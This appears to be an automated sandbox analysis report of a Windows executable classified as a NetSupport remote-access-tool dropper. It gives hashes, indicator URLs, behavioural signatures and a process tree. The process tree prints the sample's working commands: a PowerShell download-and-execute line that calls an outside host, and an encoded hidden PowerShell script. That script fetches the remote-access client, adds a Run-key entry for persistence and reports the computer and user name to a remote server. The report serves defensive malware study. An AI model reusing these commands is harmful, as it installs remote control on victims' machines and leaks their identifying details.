Analysis
-
max time kernel
101s -
max time network
104s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
16/04/2025, 01:25
Static task
static1
Behavioral task
behavioral1
Sample
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
Resource
win11-20250410-en
General
-
Target
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
-
Size
28KB
-
MD5
665aba35929da6cccc28ee3462c46187
-
SHA1
d8b04407b2807f0fc078e6bd47b6ed4a71d0b16b
-
SHA256
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8
-
SHA512
19e132a5b23bebe4795af6a57e7958267565f18c7a83419d02bfad26ca222ddbec4479f7270e0a96612adfb470a51d9622354938a554db33360b45e03eb37b62
-
SSDEEP
384:pZs2bjAkOzFGbIki9U2ZPrgghNPe6ki2kUix6LkCzHDH/n/RJGBkSFX:pyi9oZkirZPrg2RB2Ex64CzHDHf/ckg
Malware Config
Extracted
https://tribunrtp.com/bytest/bytest.zip
https://tribunrtp.com/byfil/
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 2468 powershell.exe 3 5948 powershell.exe 9 5948 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found 8 4512 Process not Found -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Windows\CurrentVersion\Run\GDriveClient = "C:\\Users\\Admin\\AppData\\Roaming\\GDriveClient\\client32.exe" powershell.exe -
pid Process 2468 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2468 powershell.exe 2468 powershell.exe 5948 powershell.exe 5948 powershell.exe 5948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 5948 powershell.exe Token: SeSecurityPrivilege 6068 client32.exe Token: SeSecurityPrivilege 5512 client32.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 6068 client32.exe 5512 client32.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3352 wrote to memory of 5004 3352 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 84 PID 3352 wrote to memory of 5004 3352 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 84 PID 3352 wrote to memory of 3376 3352 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 86 PID 3352 wrote to memory of 3376 3352 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 86 PID 3376 wrote to memory of 2468 3376 cmd.exe 88 PID 3376 wrote to memory of 2468 3376 cmd.exe 88 PID 2468 wrote to memory of 5948 2468 powershell.exe 89 PID 2468 wrote to memory of 5948 2468 powershell.exe 89 PID 5948 wrote to memory of 6068 5948 powershell.exe 91 PID 5948 wrote to memory of 6068 5948 powershell.exe 91 PID 5948 wrote to memory of 6068 5948 powershell.exe 91 PID 960 wrote to memory of 5512 960 cmd.exe 94 PID 960 wrote to memory of 5512 960 cmd.exe 94 PID 960 wrote to memory of 5512 960 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe"C:\Users\Admin\AppData\Local\Temp\5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\System32\cmd.exe/c "del %TEMP%\JavaFilee && echo eXDGeso3s9932k > %TEMP%\JavaFilee"2⤵PID:5004
-
-
C:\Windows\System32\cmd.exe/c "powershell.exe $u='https://tribunrtp.com/come.php?compName='+$env:computername;[NEt.seRviCePOINtMAnaGeR]::SECurityprotOCol = [Net.seCuRityPrOTOcOLTYpe]::TLS12;iex(iwr $u -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/541.36 (KHTML, like Gecko) Chrome/122.108.1.10 Safari/541.36').Content;"2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $u='https://tribunrtp.com/come.php?compName='+$env:computername;[NEt.seRviCePOINtMAnaGeR]::SECurityprotOCol = [Net.seCuRityPrOTOcOLTYpe]::TLS12;iex(iwr $u -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/541.36 (KHTML, like Gecko) Chrome/122.108.1.10 Safari/541.36').Content;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noproFI -eXEcUtiOnP Bypass -winDowst HiDD -EnCO JABuAEoAcAA4AFoARAA9ACcARwBEAHIAaQB2AGUAQwBsAGkAZQBuAHQAJwA7ACAAJABDADQAMQA2AG8AZAA9AGcARQBUAC0AQwBPAG0ATQBBAE4ARAAgAFMAdABBAHIAVAAtAGIASQBUAFMAVABSAGEATgBzAEYARQBSACAALQBlAHIAUgBPAFIAYQBjAHQAaQBPAE4AIABTAGkAbABFAG4AdABMAFkAQwBPAG4AVABJAE4AVQBlADsAIABbAE4ARQB0AC4AcwBlAFIAdgBpAEMAZQBQAE8ASQBOAHQATQBBAG4AYQBHAGUAUgBdADoAOgBTAEUAQwB1AHIAaQB0AHkAcAByAG8AdABPAEMAbwBsACAAPQAgAFsATgBlAHQALgBzAGUAQwB1AFIAaQB0AHkAUAByAE8AVABPAGMATwBMAFQAWQBwAGUAXQA6ADoAVABMAFMAMQAyADsAIAAkAEcAQQBJAFUARABVAD0AJwBoAHQAdABwAHMAOgAvAC8AdAByAGkAYgB1AG4AcgB0AHAALgBjAG8AbQAvAGIAeQB0AGUAcwB0AC8AYgB5AHQAZQBzAHQALgB6AGkAcAAnADsAIABDAGgAZABpAFIAIAAkAEUATgBWADoAYQBwAHAAZABhAFQAYQA7ACAAJAB2AEIAegBrAEoAZAA5AD0AJABFAG4AdgA6AEEAcABQAEQAQQBUAGEALAAgACQAbgBKAHAAOABaAEQAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAdABSAHkAIAB7ACAAbgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAUABwAGQAQQB0AEEAIAAtAE4AQQBNAEUAIAAkAG4ASgBwADgAWgBEACAALQBJAFQAZQBtAFQAeQBwAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAEEARABEAC0AVABZAHAAZQAgAC0AQQBzAFMARQBtAEIATAB5AG4AYQBtAEUAIABzAFkAUwB0AEUAbQAuAEkAbwAuAGMATwBtAHAAUgBlAHMAUwBpAE8ATgAsACAAUwBZAHMAdABFAE0ALgBpAE8ALgBjAE8ATQBQAFIAZQBzAHMAaQBvAG4ALgBmAGkAbABFAHMAeQBzAFQAZQBtACAALQBlAHIAUgBvAFIAQQBjAHQAaQBvAG4AIABTAEkATABFAG4AdABsAHkAYwBPAG4AdABJAE4AdQBFADsAIAAkAGcAYQBrAGYAVgAzADgASwA9ACgAQwBVAFIATAAgAC0AVQBSAGkAIAAkAEcAQQBJAFUARABVACAALQBVAFMARQBCAEEAcwBJAGMAUABBAFIAUwBpAE4ARwApAC4AQwBvAE4AVABlAG4AVAA7ACAAJABJAHgAcQBCAHkAQQBxAEIAPQBOAEUAVwAtAE8AQgBKAEUAYwBUACAAcwB5AHMAdABlAG0ALgBJAG8ALgBtAEUAbQBPAHIAWQBTAFQAUgBlAGEATQA7ACAAJABJAHgAcQBCAHkAQQBxAEIALgB3AHIASQB0AGUAKAAkAGcAYQBrAGYAVgAzADgASwAsACAAMAAsACAAJABnAGEAawBmAFYAMwA4AEsALgBsAGUATgBHAHQASAApADsAIAAkAEkAeABxAEIAeQBBAHEAQgAuAFMAZQBFAGsAKAAwACwAIABbAFMAWQBzAHQAZQBNAC4AaQBPAC4AcwBFAEUASwBPAFIASQBHAGkATgBdADoAOgBiAGUAZwBpAG4AKQAgAHwAIABvAHUAVAAtAE4AdQBMAEwAOwAgACQAVgBuAE4ATgBIAEoAagA4AD0ATgBlAHcALQBvAEIASgBlAEMAVAAgAHMAWQBzAHQAZQBtAC4AaQBPAC4AYwBvAE0AcABSAGUAUwBTAEkAbwBOAC4AegBpAHAAYQBSAGMASABpAHYAZQAoACQASQB4AHEAQgB5AEEAcQBCACwAIABbAFMAWQBTAHQAZQBtAC4ASQBvAC4AYwBvAG0AcAByAGUAcwBzAEkATwBOAC4AWgBJAFAAQQBSAGMAaABJAFYARQBNAG8ARABFAF0AOgA6AFIARQBhAGQAKQA7ACAARgBvAHIARQBBAEMAaAAoACQAagB3AEUAZQBYAEcAIABpAG4AIAAkAFYAbgBOAE4ASABKAGoAOAAuAGUAbgBUAHIASQBFAFMAKQAgAHsAIAAkAE8AVgBBADYAWQAyAGkATgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJAB2AEIAegBrAEoAZAA5ACwAIAAkAGoAdwBFAGUAWABHAC4ATgBhAG0ARQA7ACAAJABhAEgAQQAyAFIAeAA5AE0APQAkAGoAdwBFAGUAWABHAC4ATwBQAGUAbgAoACkAOwAgACQAQQBZAEUARAB1AEIARQBSAD0AWwBzAHkAUwB0AGUATQAuAGkATwAuAGYASQBsAEUAXQA6ADoAQwByAEUAYQB0AGUAKAAkAE8AVgBBADYAWQAyAGkATgApADsAIAAkAGEASABBADIAUgB4ADkATQAuAEMATwBwAHkAdABPACgAJABBAFkARQBEAHUAQgBFAFIAKQA7ACAAJABBAFkARQBEAHUAQgBFAFIALgBDAGwATwBzAGUAKAApADsAIAAkAGEASABBADIAUgB4ADkATQAuAEMAbABvAFMAZQAoACkAOwB9ACAAJABWAG4ATgBOAEgASgBqADgALgBEAEkAUwBwAG8AUwBlACgAKQA7ACAAJABJAHgAcQBCAHkAQQBxAEIALgBkAGkAcwBwAG8AcwBlACgAKQA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAJABQAEoAVwBWAFgAMQA9AEAAKAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAUABDAEkAQwBMADMAMgAuAEQATABMACcALAAgACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACkAOwAgAG4AaQAgAC0AcABhAHQASAAgACQAZQBOAHYAOgBBAFAAUABEAGEAdABBACAALQBOAEEATQBlACAAJABuAEoAcAA4AFoARAAgAC0AaQB0AEUATQB0AFkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAFEAegBoAE4AeAAxAHAAbQA9ACcAaAB0AHQAcABzADoALwAvAHQAcgBpAGIAdQBuAHIAdABwAC4AYwBvAG0ALwBiAHkAZgBpAGwALwAnADsAIABpAEYAIAAoACQAQwA0ADEANgBvAGQAKQAgAHsAIAAkAFAASgBXAFYAWAAxACAAfAAgAEYATwBSAEUAYQBDAEgALQBvAGIAagBlAEMAVAAgAHsAIAAkAEoAcQBXAGMAdwB1AD0AJABRAHoAaABOAHgAMQBwAG0AKwAkAF8AOwAgACQAOQA2AHUAOAB5AEoAWQA4AD0AJAB2AEIAegBrAEoAZAA5ACsAJwBcACcAKwAkAF8AOwAgAFMAVABBAFIAVAAtAGIASQBUAHMAdAByAEEATgBTAGYAZQByACAALQBzAG8AVQBSAGMAZQAgACQASgBxAFcAYwB3AHUAIAAtAEQAZQBTAHQASQBOAEEAdABpAE8AbgAgACQAOQA2AHUAOAB5AEoAWQA4ADsAIAB9ADsAfQAgAEUATABzAEUAIAB7ACAAJABQAEoAVwBWAFgAMQAgAHwAIABmAG8AcgBlAEEAQwBoAC0ATwBCAGoARQBDAFQAIAB7ACAAJABKAHEAVwBjAHcAdQA9ACQAUQB6AGgATgB4ADEAcABtACsAJABfADsAIAAkADkANgB1ADgAeQBKAFkAOAA9ACQAdgBCAHoAawBKAGQAOQArACcAXAAnACsAJABfADsAIAAkAGEAWABVAEwAZgAwAE8AbgA9ACIAYgBpAHQAcwBBAGQAbQBpAG4ALgBlAFgAZQAgAC8AVABSAEEAbgBTAEYAZQByACAAVQBHADQASQBHAGoAbAA0ACAALwBkAE8AdwBuAEwATwBhAGQAIAAvAHAAUgBJAG8AUgBpAFQAWQAgAG4ATwBSAE0AQQBsACAAJABKAHEAVwBjAHcAdQAgACQAOQA2AHUAOAB5AEoAWQA4ACIAOwAgACYAIAAkAGEAWABVAEwAZgAwAE8AbgA7AH0AOwAgAH0AOwAgAH0AOwAgACQARgBwAHMAbABUADQAZgBuAD0ARwBpACAAJAB2AEIAegBrAEoAZAA5ACAALQBGAG8AUgBDAEUAOwAgACQARgBwAHMAbABUADQAZgBuAC4AYQBUAFQAcgBpAEIAdQB0AEUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBkACAAJAB2AEIAegBrAEoAZAA5ADsAIAAkAHEAawBRAEIAbABmAFAAPQAkAHYAQgB6AGsASgBkADkAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAcwB0AEEAcgB0AC0AcABSAG8AYwBlAHMAcwAgAGMAbABJAGUAbgB0ADMAMgAuAEUAeABlADsAIABuAEUAdwAtAEkAdABFAG0AcAByAG8AUABlAFIAVABZACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABzAG8AZgBUAFcAQQBSAGUAXABNAEkAQwBSAG8AcwBvAGYAVABcAFcASQBuAGQAbwB3AFMAXABjAFUAcgBSAEUAbgBUAHYARQByAHMAaQBvAG4AXAByAHUATgAnACAALQBOAEEATQBlACAAJABuAEoAcAA4AFoARAAgAC0AdgBhAEwAdQBFACAAJABxAGsAUQBCAGwAZgBQACAALQBwAFIAbwBwAEUAUgBUAFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAJABUADcAYgB6AD0AZwBFAHQALQBwAHIATwBDAEUAcwBzACAAYwBsAGkAZQBuAHQAMwAyACAALQBlAHIAUgBPAFIAYQBjAFQAaQBPAE4AIABTAGkATABlAG4AdABMAHkAYwBvAE4AdABJAG4AdQBFADsAIAAkAEkATQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwB0AHIAaQBiAHUAbgByAHQAcAAuAGMAbwBtAC8AYwBvAHMAdABhAC8AZABlAGQAbwAuAHAAaABwAD8AYwBwAG4AbQBlAD0AJABlAG4AVgA6AEMATwBtAFAAdQBUAEUAcgBOAGEAbQBlACYAdQBzAG4AbQBlAD0AJABlAE4AVgA6AFUAUwBlAFIATgBhAG0AZQAmAHAAYQByAGEAbQA9ACIAOwAgAEkARgAgACgAJABUADcAYgB6AC4AaQBkACkAIAB7ACAAJABCAHMAVgBsADIAPQAkAEkATQByAGwAKwAnADkAbgA2AHYARQAnADsAIABjAFUAUgBsACAAJABCAHMAVgBsADIAIAAtAFUAcwBlAEIAYQBTAEkAYwBwAEEAcgBzAEkATgBnADsAfQAgAGUAbABTAGUAIAB7ACAAJABCAHMAVgBsADIAPQAkAEkATQByAGwAKwAnAG0AaQAyAFEARAAnADsAIABjAFUAUgBsACAAJABCAHMAVgBsADIAIAAtAHUAcwBlAGIAQQBTAGkAYwBQAEEAcgBTAGkAbgBnADsAfQA7AA==4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5948 -
C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe"C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6068
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe1⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exeC:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5512
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD535f65186730af30514143cf952162eb5
SHA1bee57cea35db981fa4ec0d39424b1bac4a346314
SHA2561cc35e35f244bf3cc6c22c93c2fb603db88ec85dc37383b6234d7e1bde25b06c
SHA512b6cae6d1dbcbbca2b42c280c2efdc974466571b27930641b9c744784f1467f191c33d325076d887fabce0883e9b4ffa747e5ae0bb0f191845f81a11d5d6f922e
-
Filesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
Filesize
17B
MD5f7f72191324a0bdaac7c154b3ef71c92
SHA19140004207888ba3d5d41816fd090f79ef28779f
SHA25640aea0ced08da69d5dd510cdda764cc6c6e7b173bec00e8475107fad7be21e93
SHA51289474f70263577c778ec3cf84054fb2cf9f605ed7cbe51a1ca4a86226ca3418eafdeca2a601aeb1bd5f41714d14233b9def401e7f7255e2d195c4ff21edd9d11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82